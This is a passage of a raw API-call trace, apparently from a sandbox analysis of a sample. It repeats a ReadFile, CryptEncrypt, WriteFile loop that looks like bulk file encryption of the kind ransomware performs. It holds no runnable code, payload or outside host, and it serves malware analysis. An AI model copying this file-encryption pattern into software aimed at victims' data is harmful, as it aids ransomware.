lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.485] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.485] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.485] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.485] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.485] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.486] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.486] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.487] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.487] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.488] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.488] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.488] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.488] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.488] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.489] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.489] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.489] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.489] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.489] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.489] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.490] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.490] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.490] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.490] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.490] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.490] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.491] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.491] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.492] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.492] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 